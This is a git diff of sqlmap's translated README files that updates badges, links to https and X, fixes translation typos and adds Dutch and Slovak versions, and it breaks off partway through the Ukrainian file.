[![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장악 프로세스를 자동화 하는 오픈소스 침투 테스팅 도구입니다. 최고의 침투 테스터, 데이터베이스 핑거프린팅 부터 데이터베이스 데이터 읽기, 대역 외 연결을 통한 기반 파일 시스템 접근 및 명령어 실행에 걸치는 광범위한 스위치들을 위한 강력한 탐지 엔진과 다수의 편리한 기능이 탑재되어 있습니다. @@ -20,7 +20,7 @@ sqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장 git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap은 [Python](http://www.python.org/download/) 버전 **2.6**, **2.7** 그리고 **3.x** 을 통해 모든 플랫폼 위에서 사용 가능합니다. +sqlmap은 [Python](https://www.python.org/download/) 버전 **2.6**, **2.7** 그리고 **3.x** 을 통해 모든 플랫폼 위에서 사용 가능합니다. 사용법 ---- @@ -45,6 +45,6 @@ sqlmap의 능력, 지원되는 기능과 모든 옵션과 스위치들의 목록 * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * 사용자 매뉴얼: https://github.com/sqlmapproject/sqlmap/wiki * 자주 묻는 질문 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* 트위터: [@sqlmap](https://twitter.com/sqlmap) -* 시연 영상: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* 트위터: [@sqlmap](https://x.com/sqlmap) +* 시연 영상: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * 스크린샷: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-nl-NL.md b/doc/translations/README-nl-NL.md new file mode 100644 index 00000000000..03c4dff3ef9 --- /dev/null +++ b/doc/translations/README-nl-NL.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap is een open source penetratie test tool dat het proces automatiseert van het detecteren en exploiteren van SQL injectie fouten en het overnemen van database servers. Het wordt geleverd met een krachtige detectie-engine, vele niche-functies voor de ultieme penetratietester, en een breed scala aan switches, waaronder database fingerprinting, het overhalen van gegevens uit de database, toegang tot het onderliggende bestandssysteem, en het uitvoeren van commando's op het besturingssysteem via out-of-band verbindingen. + +Screenshots +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Je kunt de [collectie met screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) bezoeken voor een demonstratie van sommige functies in the wiki. + +Installatie +---- + +Je kunt de laatste tarball installeren door [hier](https://github.com/sqlmapproject/sqlmap/tarball/master) te klikken of de laatste zipball door [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) te klikken. + +Bij voorkeur, kun je sqlmap downloaden door de [Git](https://github.com/sqlmapproject/sqlmap) repository te clonen: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap werkt op alle platformen met de volgende [Python](https://www.python.org/download/) versies: **2.6**, **2.7** en **3.x**. + +Gebruik +---- + +Om een lijst van basisopties en switches te krijgen gebruik: + + python sqlmap.py -h + +Om een lijst van alle opties en switches te krijgen gebruik: + + python sqlmap.py -hh + +Je kunt [hier](https://asciinema.org/a/46601) een proefrun vinden. +Voor een overzicht van de mogelijkheden van sqlmap, een lijst van ondersteunde functies, en een beschrijving van alle opties en switches, samen met voorbeelden, wordt u aangeraden de [gebruikershandleiding](https://github.com/sqlmapproject/sqlmap/wiki/Usage) te raadplegen. + +Links +---- + +* Homepage: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) of [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Probleem tracker: https://github.com/sqlmapproject/sqlmap/issues +* Gebruikers handleiding: https://github.com/sqlmapproject/sqlmap/wiki +* Vaak gestelde vragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pl-PL.md b/doc/translations/README-pl-PL.md index 0cbbfb25eb5..00fdf7b43b9 100644 --- a/doc/translations/README-pl-PL.md +++ b/doc/translations/README-pl-PL.md @@ -1,26 +1,26 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) -sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalającuch na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia. +sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z niej danych, a nawet pozwalających na dostęp do systemu plików oraz wykonywanie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia. -Zrzuty ekranowe +Zrzuty ekranu ---- ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) -Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstruującą na wiki niektóre możliwości. +Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrującą na wiki niektóre możliwości. Instalacja ---- -Najnowsze tarball archiwum jest dostępne po klikcięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master). +Najnowsze tarball archiwum jest dostępne po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master). Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap): git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -do użycia sqlmap potrzebny jest [Python](http://www.python.org/download/) w wersji **2.6**, **2.7** lub **3.x** na dowolnej platformie systemowej. +do użycia sqlmap potrzebny jest [Python](https://www.python.org/download/) w wersji **2.6**, **2.7** lub **3.x** na dowolnej platformie systemowej. Sposób użycia ---- @@ -33,18 +33,18 @@ Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia: python sqlmap.py -hh -Przykładowy wynik działania dostępny [tutaj](https://asciinema.org/a/46601). -Aby uzyskać listę wszystkich dostępnych fukcji, parametrów i opisów ich działania wraz z przykładami użycia sqlnap proponujemy odwiedzić [instrukjcę użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage). +Przykładowy wynik działania można znaleźć [tutaj](https://asciinema.org/a/46601). +Aby uzyskać listę wszystkich dostępnych funkcji, parametrów oraz opisów ich działania wraz z przykładami użycia sqlmap zalecamy odwiedzić [instrukcję użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Odnośniki ---- * Strona projektu: https://sqlmap.org -* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) lub [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues +* Zgłaszanie błędów: https://github.com/sqlmapproject/sqlmap/issues * Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki * Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Dema: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots +* X: [@sqlmap](https://x.com/sqlmap) +* Dema: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Zrzuty ekranu: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pt-BR.md b/doc/translations/README-pt-BR.md index 3a707deb111..6fe64ed6a49 100644 --- a/doc/translations/README-pt-BR.md +++ b/doc/translations/README-pt-BR.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap é uma ferramenta de teste de intrusão, de código aberto, que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de intrusão por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional. @@ -20,7 +20,7 @@ De preferência, você pode baixar o sqlmap clonando o repositório [Git](https: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6**, **2.7** e **3.x** em todas as plataformas. +sqlmap funciona em [Python](https://www.python.org/download/) nas versões **2.6**, **2.7** e **3.x** em todas as plataformas. Como usar ---- @@ -45,6 +45,6 @@ Links * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki * Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demonstrações: [#1](https://www.youtube.com/user/inquisb/videos) e [#2](https://www.youtube.com/user/stamparm/videos) * Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-rs-RS.md b/doc/translations/README-rs-RS.md index 82ab3bd7677..de0fb2e2f3e 100644 --- a/doc/translations/README-rs-RS.md +++ b/doc/translations/README-rs-RS.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap je alat otvorenog koda namenjen za penetraciono testiranje koji automatizuje proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije i preuzimanje baza podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko uzimanja podataka iz baze, do pristupa zahvaćenom fajl sistemu i izvršavanja komandi na operativnom sistemu korištenjem tzv. "out-of-band" veza. @@ -20,7 +20,7 @@ Opciono, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproj git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap radi bez posebnih zahteva korištenjem [Python](http://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. +sqlmap radi bez posebnih zahteva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. Korišćenje ---- @@ -45,6 +45,6 @@ Linkovi * Prijava problema: https://github.com/sqlmapproject/sqlmap/issues * Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki * Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Slike: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ru-RUS.md b/doc/translations/README-ru-RU.md similarity index 75% rename from doc/translations/README-ru-RUS.md rename to doc/translations/README-ru-RU.md index 61646886594..c88f532e6b5 100644 --- a/doc/translations/README-ru-RUS.md +++ b/doc/translations/README-ru-RU.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение. @@ -20,7 +20,7 @@ sqlmap - это инструмент для тестирования уязви git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap работает из коробки с [Python](http://www.python.org/download/) версии **2.6**, **2.7** и **3.x** на любой платформе. +sqlmap работает из коробки с [Python](https://www.python.org/download/) версии **2.6**, **2.7** и **3.x** на любой платформе. Использование ---- @@ -45,6 +45,6 @@ sqlmap работает из коробки с [Python](http://www.python.org/do * Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues * Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki * Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Демки: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-sk-SK.md b/doc/translations/README-sk-SK.md new file mode 100644 index 00000000000..0f32c0c4d14 --- /dev/null +++ b/doc/translations/README-sk-SK.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení. + +Snímky obrazovky +---- + +![snímka obrazovky](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki. + +Inštalácia +---- + +Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme. + +Využitie +---- + +Na získanie zoznamu základných možností a prepínačov, použite: + + python sqlmap.py -h + +Na získanie zoznamu všetkých možností a prepínačov, použite: + + python sqlmap.py -hh + +Vzorku behu nájdete [tu](https://asciinema.org/a/46601). +Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Linky +---- + +* Domovská stránka: https://sqlmap.org +* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues +* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki +* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots \ No newline at end of file diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md index f2508202abc..fb2aba28075 100644 --- a/doc/translations/README-tr-TR.md +++ b/doc/translations/README-tr-TR.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır. @@ -11,7 +11,7 @@ Ekran görüntüleri ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) -İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. +İsterseniz özelliklerin tanıtımının yapıldığı [ekran görüntüleri](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. Kurulum @@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir. +sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir. Kullanım ---- @@ -48,6 +48,6 @@ Bağlantılar * Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues * Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki * Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demolar: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-uk-UA.md b/doc/translations/README-uk-UA.md index 6ad8c684e18..26e96f7d6cf 100644 --- a/doc/translations/README-uk-UA.md +++ b/doc/translations/README-uk-UA.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap - це інструмент для тестування вразливостей з відкритим сирцевим кодом, який автоматизує процес виявлення і використання дефектів SQL-ін'єкцій, а також захоплення серверів баз даних. Він оснащений потужним механізмом виявлення, безліччю приємних функцій для професійного тестувальника вразливостей і широким спектром скриптів, які спрощують роботу з базами даних - від відбитка бази даних до доступу до базової файлової системи та виконання команд в операційній системі через out-of-band з'єднання. @@ -20,7 +20,7 @@ sqlmap - це інструмент для тестування вразливо git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap «працює з коробки» з [Python](http://www.python.org/download/) версії **2.6**, **2.7** та **3.x** на будь-якій платформі. +sqlmap «працює з коробки» з [Python](https://www.python.org/download/) версії **2.6**, **2.7** та **3.x** на будь-якій платформі. Використання ---- @@ -45,6 +45,6 @@ sqlmap «працює з коробки» з [Python](http://www.python.org/down * Відстеження проблем: 